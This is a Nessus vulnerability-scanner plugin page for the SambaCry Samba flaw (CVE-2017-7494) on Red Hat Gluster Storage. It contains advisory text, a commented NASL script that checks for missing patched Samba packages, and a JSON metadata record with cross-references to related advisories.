RHEL 6 / 7 : Storage Server (RHSA-2017:1273) (SambaCry)
2017-05-26T00:00:00
ID: REDHAT-RHSA-2017-1273.NASL | Type: nessus | Reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. | Modified: 2021-03-02T00:00:00
Description
An update for samba is now available for Red Hat Gluster Storage 3.2
for RHEL 6 and Red Hat Gluster Storage 3.2 for RHEL 7.
Red Hat Product Security has rated this update as having a security
impact of Important. A Common Vulnerability Scoring System (CVSS) base
score, which gives a detailed severity rating, is available for each
vulnerability from the CVE link(s) in the References section.
Samba is an open source implementation of the Server Message Block
(SMB) protocol and the related Common Internet File System (CIFS)
protocol, which allow PC-compatible machines to share files, printers,
and various information.
Security Fix(es) :
A remote code execution flaw was found in Samba. A malicious
authenticated samba client, having write access to the samba share,
could use this flaw to execute arbitrary code as root. (CVE-2017-7494)
Red Hat would like to thank the Samba project for reporting this
issue. Upstream acknowledges steelo as the original reporter.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2017:1273. The text
# itself is copyright (C) Red Hat, Inc.
#
include("compat.inc");
# Description pass: when `description` is set, the script only registers its
# metadata (identity, advisory text, scoring, CPEs, prerequisites) and then
# exits; none of the host checks further down run in this pass.
if (description)
{
# Plugin identity and revision stamp.
script_id(100453);
script_version("3.18");
script_cvs_date("Date: 2019/10/24 15:35:43");
# The CVE and the Red Hat advisory this plugin tracks.
script_cve_id("CVE-2017-7494");
script_xref(name:"RHSA", value:"2017:1273");
script_name(english:"RHEL 6 / 7 : Storage Server (RHSA-2017:1273) (SambaCry)");
script_summary(english:"Checks the rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote Red Hat host is missing one or more security updates."
);
# Advisory text; per the file header it was extracted from RHSA-2017:1273.
# The string literal spans several lines and is left exactly as it appears.
script_set_attribute(
attribute:"description",
value:
"An update for samba is now available for Red Hat Gluster Storage 3.2
for RHEL 6 and Red Hat Gluster Storage 3.2 for RHEL 7.
Red Hat Product Security has rated this update as having a security
impact of Important. A Common Vulnerability Scoring System (CVSS) base
score, which gives a detailed severity rating, is available for each
vulnerability from the CVE link(s) in the References section.
Samba is an open source implementation of the Server Message Block
(SMB) protocol and the related Common Internet File System (CIFS)
protocol, which allow PC-compatible machines to share files, printers,
and various information.
Security Fix(es) :
* A remote code execution flaw was found in Samba. A malicious
authenticated samba client, having write access to the samba share,
could use this flaw to execute arbitrary code as root. (CVE-2017-7494)
Red Hat would like to thank the Samba project for reporting this
issue. Upstream acknowledges steelo as the original reporter."
);
# Reference links: the erratum and Red Hat's CVE page.
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/errata/RHSA-2017:1273"
);
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2017-7494"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
# CVSS v2 and v3.0 base and temporal vectors.
# NOTE(review): the advisory text above describes an authenticated client
# with write access to a share, while these vectors carry Au:N / PR:N.
# Confirm which precondition applies in your environment before relying on
# the score alone for triage.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
# Exploitability metadata: exploits are marked as available, with entries
# for the Core, Metasploit and CANVAS frameworks.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Samba is_known_pipename() Arbitrary Module Load');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
# plugin_type "local": this matches the required KB keys at the end of this
# block (local checks enabled, release banner, RPM list, CPU).
script_set_attribute(attribute:"plugin_type", value:"local");
# One CPE per package named in the advisory, followed by the two OS releases.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ctdb");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:ctdb-tests");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:libsmbclient");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:libwbclient");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:libwbclient-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-client");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-client-libs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-common");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-common-libs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-common-tools");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-dc");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-dc-libs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-krb5-printing");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-libs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-pidl");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-python");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-test");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-test-libs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-vfs-glusterfs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-winbind");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:samba-winbind-modules");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:6");
script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7");
# Timeline: the patch date (05/24) precedes the plugin date (05/26) and the
# recorded vulnerability publication date (05/30).
script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/30");
script_set_attribute(attribute:"patch_publication_date", value:"2017/05/24");
script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/26");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
# Category, ownership and family of the plugin.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Red Hat Local Security Checks");
# Prerequisites: a dependency on ssh_get_info.nasl and four KB keys.
# Presumably ssh_get_info.nasl is what populates those Host/* keys; confirm
# against that plugin, which is not shown here.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
# End of the description pass.
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");
# Pre-flight gates, evaluated in order. The first gate that fails passes its
# own reason code to audit() (defined in audit.inc, not shown here), so the
# order of these checks decides which reason gets reported.

# Gate 1: local (credentialed) checks must be enabled for this host.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

# Gate 2: a release banner must exist and contain "Red Hat".
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || !("Red Hat" >< release))
  audit(AUDIT_OS_NOT, "Red Hat");

# Gate 3: pull the numeric release (major, optional ".minor") out of the banner.
ver_match = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(ver_match))
  audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = ver_match[1];

# Gate 4: only a leading 6 or 7 followed by a non-digit (or end of string) is
# accepted, so "6.9" or "7" pass while a value such as "60" does not.
if (!preg(pattern:"^(6|7)([^0-9]|$)", string:os_ver))
  audit(AUDIT_OS_NOT, "Red Hat 6.x / 7.x", "Red Hat " + os_ver);

# Gate 5: the collected RPM list must be present in the KB.
if (!get_kb_item("Host/RedHat/rpm-list"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Gate 6: the architecture must be known and be x86_64, i386-i686 or s390*.
# NOTE(review): this gate is wider than the package checks later in the file,
# which pass cpu:"x86_64" for every package except samba-common and
# samba-pidl. On the other accepted architectures only those two packages
# can be evaluated by the rpm path.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
  audit(AUDIT_UNKNOWN_ARCH);
if (!("x86_64" >< cpu || cpu =~ "^i[3-6]86$" || "s390" >< cpu))
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
# Decide whether RHSA-2017:1273 is still outstanding on the host.
#
# Two evidence sources are used, never both:
#   * if the KB holds yum updateinfo data, the verdict comes from a report
#     generated for this advisory id;
#   * otherwise each advisory package is compared against its fixed build.
#
# Only package metadata is evaluated. Nothing here inspects Samba's
# configuration or whether the service is running, so a finding means
# "fixed packages are missing", not "the flaw was demonstrated".
yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (empty_or_null(yum_updateinfo))
{
  flag = 0;

  # This advisory is for the Storage Server product: without
  # glusterfs-server on either release the check does not apply.
  # (The yum branch below does not repeat this gate.)
  if (!rpm_exists(release:"RHEL6", rpm:"glusterfs-server") &&
      !rpm_exists(release:"RHEL7", rpm:"glusterfs-server"))
    audit(AUDIT_PACKAGE_NOT_INSTALLED, "Storage Server");

  # Fixed builds for RHEL 6, in the order they are checked and reported.
  el6_refs = make_list(
    "ctdb-4.4.6-5.el6",
    "ctdb-tests-4.4.6-5.el6",
    "libsmbclient-4.4.6-5.el6",
    "libsmbclient-devel-4.4.6-5.el6",
    "libwbclient-4.4.6-5.el6",
    "libwbclient-devel-4.4.6-5.el6",
    "samba-4.4.6-5.el6",
    "samba-client-4.4.6-5.el6",
    "samba-client-libs-4.4.6-5.el6",
    "samba-common-4.4.6-5.el6",
    "samba-common-libs-4.4.6-5.el6",
    "samba-common-tools-4.4.6-5.el6",
    "samba-dc-4.4.6-5.el6",
    "samba-dc-libs-4.4.6-5.el6",
    "samba-debuginfo-4.4.6-5.el6",
    "samba-devel-4.4.6-5.el6",
    "samba-krb5-printing-4.4.6-5.el6",
    "samba-libs-4.4.6-5.el6",
    "samba-pidl-4.4.6-5.el6",
    "samba-python-4.4.6-5.el6",
    "samba-test-4.4.6-5.el6",
    "samba-test-libs-4.4.6-5.el6",
    "samba-vfs-glusterfs-4.4.6-5.el6",
    "samba-winbind-4.4.6-5.el6",
    "samba-winbind-clients-4.4.6-5.el6",
    "samba-winbind-krb5-locator-4.4.6-5.el6",
    "samba-winbind-modules-4.4.6-5.el6"
  );

  foreach pkg_ref (el6_refs)
  {
    # samba-common and samba-pidl are the only packages checked without a
    # cpu argument; every other package is checked for x86_64.
    if (pkg_ref == "samba-common-4.4.6-5.el6" || pkg_ref == "samba-pidl-4.4.6-5.el6")
      outdated = rpm_check(release:"RHEL6", reference:pkg_ref);
    else
      outdated = rpm_check(release:"RHEL6", cpu:"x86_64", reference:pkg_ref);

    if (outdated) flag++;
  }

  # Fixed builds for RHEL 7, same package order as above.
  el7_refs = make_list(
    "ctdb-4.4.6-5.el7",
    "ctdb-tests-4.4.6-5.el7",
    "libsmbclient-4.4.6-5.el7",
    "libsmbclient-devel-4.4.6-5.el7",
    "libwbclient-4.4.6-5.el7",
    "libwbclient-devel-4.4.6-5.el7",
    "samba-4.4.6-5.el7",
    "samba-client-4.4.6-5.el7",
    "samba-client-libs-4.4.6-5.el7",
    "samba-common-4.4.6-5.el7",
    "samba-common-libs-4.4.6-5.el7",
    "samba-common-tools-4.4.6-5.el7",
    "samba-dc-4.4.6-5.el7",
    "samba-dc-libs-4.4.6-5.el7",
    "samba-debuginfo-4.4.6-5.el7",
    "samba-devel-4.4.6-5.el7",
    "samba-krb5-printing-4.4.6-5.el7",
    "samba-libs-4.4.6-5.el7",
    "samba-pidl-4.4.6-5.el7",
    "samba-python-4.4.6-5.el7",
    "samba-test-4.4.6-5.el7",
    "samba-test-libs-4.4.6-5.el7",
    "samba-vfs-glusterfs-4.4.6-5.el7",
    "samba-winbind-4.4.6-5.el7",
    "samba-winbind-clients-4.4.6-5.el7",
    "samba-winbind-krb5-locator-4.4.6-5.el7",
    "samba-winbind-modules-4.4.6-5.el7"
  );

  foreach pkg_ref (el7_refs)
  {
    if (pkg_ref == "samba-common-4.4.6-5.el7" || pkg_ref == "samba-pidl-4.4.6-5.el7")
      outdated = rpm_check(release:"RHEL7", reference:pkg_ref);
    else
      outdated = rpm_check(release:"RHEL7", cpu:"x86_64", reference:pkg_ref);

    if (outdated) flag++;
  }

  if (!flag)
  {
    # Nothing flagged: report which packages were tested, or that none of
    # the advisory's packages were found.
    tested = pkg_tests_get();
    if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
    else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ctdb / ctdb-tests / libsmbclient / libsmbclient-devel / libwbclient / etc");
  }
  else
  {
    # At least one package was flagged: emit the accumulated rpm report
    # together with the Red Hat package caveat text.
    security_report_v4(
      port     : 0,
      severity : SECURITY_HOLE,
      extra    : rpm_report_get() + redhat_report_package_caveat()
    );
    exit(0);
  }
}
else
{
  # yum updateinfo data is available: ask for a report on this advisory id.
  rhsa = "RHSA-2017:1273";
  yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
  if (empty_or_null(yum_report))
  {
    # No report for this advisory: the host is audited out as not affected.
    audit_message = "affected by Red Hat security advisory " + rhsa;
    audit(AUDIT_OS_NOT, audit_message);
  }
  else
  {
    security_report_v4(
      port     : 0,
      severity : SECURITY_HOLE,
      extra    : yum_report
    );
    exit(0);
  }
}
{"id": "REDHAT-RHSA-2017-1273.NASL", "bulletinFamily": "scanner", "title": "RHEL 6 / 7 : Storage Server (RHSA-2017:1273) (SambaCry)", "description": "An update for samba is now available for Red Hat Gluster Storage 3.2\nfor RHEL 6 and Red Hat Gluster Storage 3.2 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.", "published": "2017-05-26T00:00:00", "modified": "2021-03-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/100453", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://access.redhat.com/errata/RHSA-2017:1273", "https://access.redhat.com/security/cve/cve-2017-7494"], "cvelist": ["CVE-2017-7494"], "type": "nessus", "lastseen": "2021-03-01T05:39:25", "edition": 39, "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4"]}, {"type": "cve", "idList": ["CVE-2017-7494"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D20A6BA20BB0FAD48EDDE6836F08EDBA"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-CVE-2017-7494.NSE"]}, {"type": "f5", "idList": ["F5:K13551136"]}, {"type": "seebug", "idList": ["SSV:93139"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:70F4A599D7DDC69173F490543EA5873E", "RAPID7COMMUNITY:38689BEB2152AB6F6A52F8E26AA1499F"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786995", "MYHACK58:62201786477", "MYHACK58:62201786521", "MYHACK58:62201786440"]}, {"type": "thn", "idList": ["THN:B1F7A116FFB321FFB433B2511F0594AA", "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "THN:4706A097E7EBD85B2426246B35CDC5E6", "THN:9DF1743B35B2E69D4835136091D08EAD"]}, {"type": "fedora", "idList": ["FEDORA:219F3605E539", "FEDORA:0B8006061CC2", "FEDORA:BC7B0601FC16"]}, {"type": "threatpost", "idList": ["THREATPOST:6B393C6EA80E795EF303485AFABE5327", "THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1"]}, {"type": "ubuntu", "idList": ["USN-3296-2", "USN-3296-1"]}, {"type": "nessus", "idList": ["FEDORA_2017-642A0ECA75.NASL", "SLACKWARE_SSA_2017-144-01.NASL", "SUSE_SU-2017-1393-1.NASL", "REDHAT-RHSA-2017-1270.NASL", "ORACLELINUX_ELSA-2017-1272.NASL", "SL_20170524_SAMBA4_ON_SL6_X.NASL", "FEDORA_2017-C729C6123C.NASL", "SUSE_SU-2017-1392-1.NASL", "FEDORA_2017-570C0071C4.NASL", "REDHAT-RHSA-2017-1272.NASL"]}, {"type": "avleonov", "idList": ["AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142782", "PACKETSTORM:142715", "PACKETSTORM:142657"]}, {"type": "suse", "idList": 
["SUSE-SU-2017:1393-1", "OPENSUSE-SU-2017:1415-1", "SUSE-SU-2017:1392-1", "OPENSUSE-SU-2017:1401-1", "SUSE-SU-2017:1391-1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20171129-01-SAMBA", "HUAWEI-SA-20170613-01-SAMBA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851559", "OPENVAS:703860", "OPENVAS:1361412562310811055", "OPENVAS:1361412562310851557", "OPENVAS:1361412562310882723", "OPENVAS:1361412562310872719", "OPENVAS:1361412562310872718", "OPENVAS:1361412562310871821", "OPENVAS:1361412562310882724", "OPENVAS:1361412562310890951"]}, {"type": "redhat", "idList": ["RHSA-2017:1273", "RHSA-2017:1271", "RHSA-2017:1272", "RHSA-2017:1390", "RHSA-2017:1270"]}, {"type": "centos", "idList": ["CESA-2017:1271", "CESA-2017:1270"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-1272", "ELSA-2017-1270", "ELSA-2017-1271"]}, {"type": "slackware", "idList": ["SSA-2017-144-01"]}, {"type": "cisa", "idList": ["CISA:384A71FB1AD858FAC86EEB1A7660E778"]}, {"type": "exploitdb", "idList": ["EDB-ID:42060", "EDB-ID:42084"]}, {"type": "canvas", "idList": ["SAMBA_IS_KNOWN_PIPENAME"]}, {"type": "zdt", "idList": ["1337DAY-ID-27859"]}, {"type": "talosblog", "idList": ["TALOSBLOG:9256DE4CBAB937F2D9EAEDCA068E3DE9"]}, {"type": "freebsd", "idList": ["6F4D96C0-4062-11E7-B291-B499BAEBFEAF"]}, {"type": "archlinux", "idList": ["ASA-201705-22"]}, {"type": "cisco", "idList": ["CISCO-SA-20170530-SAMBA"]}, {"type": "saint", "idList": ["SAINT:3579A721D51A069C725493EA48A26E42"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:11BDEE18B40708887778CCF837705185"]}], "modified": "2021-03-01T05:39:25", "rev": 2}, "score": {"value": 9.2, "vector": "NONE", "modified": "2021-03-01T05:39:25", "rev": 2}, "vulnersScore": 9.2}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1273. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100453);\n script_version(\"3.18\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1273\");\n\n script_name(english:\"RHEL 6 / 7 : Storage Server (RHSA-2017:1273) (SambaCry)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for samba is now available for Red Hat Gluster Storage 3.2\nfor RHEL 6 and Red Hat Gluster Storage 3.2 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. 
Upstream acknowledges steelo as the original reporter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1273\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-7494\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-krb5-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-test-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1273\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"glusterfs-server\") || rpm_exists(release:\"RHEL7\", rpm:\"glusterfs-server\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Storage Server\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ctdb-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"ctdb-tests-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", 